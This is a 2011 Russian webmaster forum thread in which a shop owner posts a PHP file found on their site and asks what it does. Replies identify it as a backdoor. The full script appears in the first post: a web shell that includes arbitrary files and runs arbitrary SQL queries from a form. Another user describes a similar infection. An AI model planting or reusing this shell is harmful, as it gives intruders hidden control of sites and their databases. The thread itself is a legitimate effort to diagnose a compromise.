X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Нашел у себя зловредный код на сайте....., Жизнь мне 2 месяца портил....
ThePixel
ThePixel
Topic Starter сообщение 15.11.2011, 0:06; Ответить: ThePixel
Сообщение #1


Бывалый
****


Группа: User
Сообщений: 265
Регистрация: 4.3.2011
Из: Москва
Поблагодарили: 29 раз
Репутация:   5  


Прошу Вас рассмотреть данный код и дать понять что он делает:

<?php
session_start();
function s(){
$args = func_get_args();
if(count($args)==1){
if(isset($_SESSION[$args[0]])){
return $_SESSION[$args[0]];
}else{
return false;
}
}elseif(count($args)==2){
$_SESSION[$args[0]] = $args[1];
}
}
function r($arr,$print=true){
$str = '<tr><td>'.implode('</td><td>',$arr).'</td></tr>';
if($print){
print($str);
}else{
return $str;
}
}
if(!empty($_POST['connect'])){
if(file_exists($_POST['connect'])){
s('connect',$_POST['connect']);
}
}
if(s('connect') && file_exists(s('connect'))){
include(s('connect'));
print('included '.s('connect').'<br />');
}else{
print('nofile');
}
if(!empty($_POST['query'])){
mysql_query("SET NAMES utf8");
$sql = stripslashes($_POST['query']);
print($sql.'<br />');
$res = mysql_query($sql);
print(mysql_error());
$i = 0;
?>
<table border="1px" style="border-collapse: collapse; font-size: 0.7em">
<?php
while($row = mysql_fetch_array($res,MYSQL_ASSOC)){

if($i%100 == 0){
r(array_keys($row));
}
r($row);
$i++;
}
?>
</table>
<?php
}else{
$sql = '';
}
?>
<form action="<?=$_SERVER['REQUEST_URI']?>" method="post">
<input type="text" name="connect" /><br />
<textarea name="query" rows="25" cols="80" ><?=$sql?></textarea><br />
<input type="submit">
</form>


Жду комментариев, ох сколько же нервов он мне попортил.


--------------------
-1
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kronos
kronos
сообщение 15.11.2011, 0:21; Ответить: kronos
Сообщение #2


Белый веб-мастер
*******


Группа: Active User
Сообщений: 4703
Регистрация: 10.2.2009
Из: Харьков
Поблагодарили: 2629 раз
Репутация:   327  


на зловредный не похож


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ThePixel
ThePixel
Topic Starter сообщение 15.11.2011, 0:25; Ответить: ThePixel
Сообщение #3


Бывалый
****


Группа: User
Сообщений: 265
Регистрация: 4.3.2011
Из: Москва
Поблагодарили: 29 раз
Репутация:   5  


(kronos @ 15.11.2011, 0:21) *
на зловредный не похож

Может и нет но его функционал я не понимаю, у меня весь сайт танцует с БД вместе
http://www.saronit.ru/subcategory.php?id=332&bid=38 - вот пример в тексте.

и еще раскладка меняется по схожести букв с латиницы на русские...


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Max_Q
Max_Q
сообщение 15.11.2011, 1:04; Ответить: Max_Q
Сообщение #4


Участник
***

Группа: User
Сообщений: 118
Регистрация: 13.11.2011
Поблагодарили: 46 раз
Репутация:   13  


Благодаря этому файлу можно подключать php файлы и выполнять произвольные запросы к базе данных. Так что это действительно "вредный код", благодаря которому можно получить доступ к сайту.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
bobgubko
bobgubko
сообщение 15.11.2011, 1:05; Ответить: bobgubko
Сообщение #5


Частый гость
**

Группа: User
Сообщений: 58
Регистрация: 20.4.2009
Из: Ukraine, Niko
Поблагодарили: 20 раз
Репутация:   18  


Не зловред? Та ладно. На shell похоже. На месте ТС я бы его удалил, если это не часть движка.


--------------------
php, js, html, css, python
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ThePixel
ThePixel
Topic Starter сообщение 15.11.2011, 1:32; Ответить: ThePixel
Сообщение #6


Бывалый
****


Группа: User
Сообщений: 265
Регистрация: 4.3.2011
Из: Москва
Поблагодарили: 29 раз
Репутация:   5  


Max_Q, Вот это оно и есть, у меня интернет магазин просто вешался, когда меняется наименование товара или еще что)))

Сообщение отредактировал bum - 2.4.2012, 14:49
Причина редактирования: -overquotting


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
FRUTALITY
FRUTALITY
сообщение 15.11.2011, 14:45; Ответить: FRUTALITY
Сообщение #7


Участник
***

Группа: User
Сообщений: 144
Регистрация: 7.9.2010
Поблагодарили: 39 раз
Репутация:   3  


В каком/каких файлах данный код нашелся?

Дело в том, что сегодня я тоже обнаружил вредоносный код на своих сайтах. Все, что нашел - это появившаяся строка в каждом php файле; файл вида tmp_32795234523.php в корне каждого сайта; 6 файлов такого же вида в корне FTP; а также код в htaccess каждого сайта.

Заподозрил что-то неладное, когда на всех сайтах начался спад посещаемости; случайно увидел, как браузер при открытии моего сайта грузит какую-то информацию с домена turnitupnow.net - проверил сайты, нашел вредоносный код. Но, боюсь, что не весь.

Поэтому повторю вопрос, в каком файле вы нашли этот код? Тоже гляну у себя.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.


--------------------
Magic 8 ball как в фильме "Трасса 60". Онлайн.
Мой скромный бложе.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Почему разнообразие на сайте вредит проекту?
24 Kiloan_Frost 1419 Сегодня, 0:48
автор: Kiloan_Frost
Открытая тема (нет новых ответов) Узнай все, о своем и чужом сайте
Выгрузка: Ahrefs+Semrush+Majestic+Spywords
7 matrixzp 1300 21.5.2018, 2:03
автор: matrixzp
Горячая тема (нет новых ответов) Ню фото на сайте фотографа
Раздел или отдельный сайт
29 Valerypantera 1505 20.5.2018, 17:02
автор: genjnat
Открытая тема (нет новых ответов) Видео баннер на сайте и его влияние
0 Seoworke 294 17.5.2018, 10:56
автор: Seoworke
Открытая тема (нет новых ответов) Вопрос по поводу цен на сайте
16 WildWeb8 941 13.5.2018, 17:40
автор: genjnat


 



RSS Текстовая версия Сейчас: 24.5.2018, 1:23
Дизайн